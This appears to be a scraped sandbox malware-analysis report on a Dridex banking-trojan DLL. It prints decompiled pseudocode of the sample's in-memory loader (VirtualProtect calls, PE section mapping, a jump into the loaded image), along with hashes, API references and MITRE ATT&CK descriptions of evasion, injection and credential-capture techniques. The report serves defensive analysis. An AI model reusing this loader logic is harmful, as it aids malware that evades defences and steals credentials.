				_v64 = 4;
				_v68 = _t243;
				_v72 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t271); // executed
				_v76 = _t147;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x58));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E00BA1770();
				E00BA17BD(_v68,  *((intOrPtr*)(_v48 + 0x28)), _v56);
				E00BA1770( *((intOrPtr*)(_v48 + 0x28)), 0, _v56);
				_t155 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t278 = _t275 - 0x8c;
				_t233 = _v68;
				_t259 =  *((intOrPtr*)(_t233 + 0x3c));
				_v96 = _t155;
				_v100 = _v68 + 0x3c;
				_v104 = _t233;
				_v108 = _t259;
				if(_t259 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v120 = _v104;
				if(_v60 != 0) {
					_v124 = 0;
					_v128 = _v120 + 0x18 + ( *(_v120 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v128;
						_t250 =  *(_t174 + 0x24);
						_v140 = _t174;
						_v144 = _t250 >> 0x1f;
						_v148 =  *((intOrPtr*)(_v140 + 8));
						_v188 = _v68 +  *((intOrPtr*)(_v140 + 0xc));
						_v184 = _v148;
						_v180 =  *((intOrPtr*)(0xba4418 + ((_t250 >> 0x0000001e & 0x00000001) << 4) + (_v144 << 3) + ((_t250 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v152 = _v124;
						_t183 = VirtualProtect(??, ??, ??, ??); // executed
						_t278 = _t278 - 0x10;
						_t226 = _v152 + 1;
						_v156 = _t183;
						_v124 = _t226;
						_v128 = _v140 + 0x28;
						if(_t226 == _v60) {
							goto L8;
						}
					}
				}
				L8:
				 *_t278 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x24));
				_t159 = DisableThreadLibraryCalls(??);
				_t279 = _t278 - 4;
				_t236 =  *_v100;
				_v136 = _t159;
				_v112 = _t236;
				_v116 = _v68;
				if(_t236 != 0) {
					_v116 = _v68 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t247 = _v48;
				_v44 =  *((intOrPtr*)(_t247 + 0x50));
				_v40 =  *_t247;
				_v36 =  *((intOrPtr*)(_t247 + 0x18));
				_v32 =  *((intOrPtr*)(_t247 + 0x4c));
				_v28 =  *((intOrPtr*)(_t247 + 0x10));
				_v24 = _v132;
				 *_t279 = _t247;
				_v188 = 0;
				_v184 = 0x60;
				_v160 =  &_v44;
				_v164 = 0;
				_v168 = 0x60;
				_v172 =  *((intOrPtr*)(_v116 + 0x28));
				E00BA1770();
				if(_v172 != 0) {
					_t279 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x00ba209e
0x00ba20ac
0x00ba20b3
0x00ba20b6
0x00ba20c0
0x00ba20c7
0x00ba20d1
0x00ba20d7
0x00ba20e0
0x00ba20e9
0x00ba20ec
0x00ba20f0
0x00ba20f8
0x00ba20ff
0x00ba2102
0x00ba2105
0x00ba2108
0x00ba210b
0x00ba2125
0x00ba212b
0x00ba212e
0x00ba2136
0x00ba213a
0x00ba213d
0x00ba2140
0x00ba2143
0x00ba2146
0x00ba2162
0x00ba217f
0x00ba21a4
0x00ba21a6
0x00ba21af
0x00ba21b2
0x00ba21bc
0x00ba21bf
0x00ba21c2
0x00ba21c5
0x00ba21c8
0x00ba2216
0x00ba2216
0x00ba2249
0x00ba224c
0x00ba225c
0x00ba225f
0x00ba22a8
0x00ba22a8
0x00ba22b7
0x00ba22bf
0x00ba22cd
0x00ba22dc
0x00ba230d
0x00ba2316
0x00ba231a
0x00ba231e
0x00ba2325
0x00ba232b
0x00ba232d
0x00ba2336
0x00ba2347
0x00ba234d
0x00ba2350
0x00ba2353
0x00000000
0x00000000
0x00ba2359
0x00ba22a8
0x00ba2264
0x00ba2272
0x00ba227a
0x00ba227d
0x00ba227f
0x00ba2285
0x00ba2291
0x00ba2297
0x00ba229a
0x00ba229d
0x00ba21f9
0x00ba21f9
0x00ba236e
0x00ba2374
0x00ba2379
0x00ba237f
0x00ba2385
0x00ba238b
0x00ba2391
0x00ba2394
0x00ba2397
0x00ba239f
0x00ba23a7
0x00ba23ad
0x00ba23b3
0x00ba23b9
0x00ba23bf
0x00ba23cd
0x00ba21da
0x00ba21e0
0x00ba21e0
0x00ba2234

APIs

VirtualProtect.KERNELBASE ref: 00BA210B
VirtualProtect.KERNELBASE ref: 00BA21A4
VirtualProtect.KERNELBASE ref: 00BA232B

Strings

`, xrefs: 00BA239F

Memory Dump Source

Source File: 00000002.00000002.699648327.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: `
API String ID: 544645111-2679148245
Opcode ID: cc7f36a88bbd403670e8b2b87c9b2df5099be01caaca6641184a8073b79f2773
Instruction ID: eabbc5d18d50b0ccf7f347129b0b79d64a6568363339716a2d37e0fe051f6a40
Opcode Fuzzy Hash: cc7f36a88bbd403670e8b2b87c9b2df5099be01caaca6641184a8073b79f2773
Instruction Fuzzy Hash: 43B1ADB5E043188FDB14CF99C880A9DBBF1FF89304F1585AAE958AB351D730A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00BA1000, Relevance: 1.4, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00BA10FF

Memory Dump Source

Source File: 00000002.00000002.699648327.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction ID: 94a5a8d7c4caba75582d7b59c9ea6dc2549887d68ee1f84e100f8a00a7766803
Opcode Fuzzy Hash: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction Fuzzy Hash: AB41F4B5E052198FDB44DFA8C490AAEBBF0FF48314F19856EE548AB340D775A880CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Function 6E710730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Function 6E712234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6E712820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6E713138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00A42092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Function 6E715E84, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Function 6E7110A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6E7157B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6E715B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 00A426AA, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Function 6E711166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 6E715BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6E715BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6E715BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6E715BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6E715C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6E715E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6E71564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6E711030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6E713628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6E701494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6E70A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6E708428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6E719370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6E71143C, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6E706D0C, Relevance: .0, Instructions: 36
COMMON

Function 00BA2092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON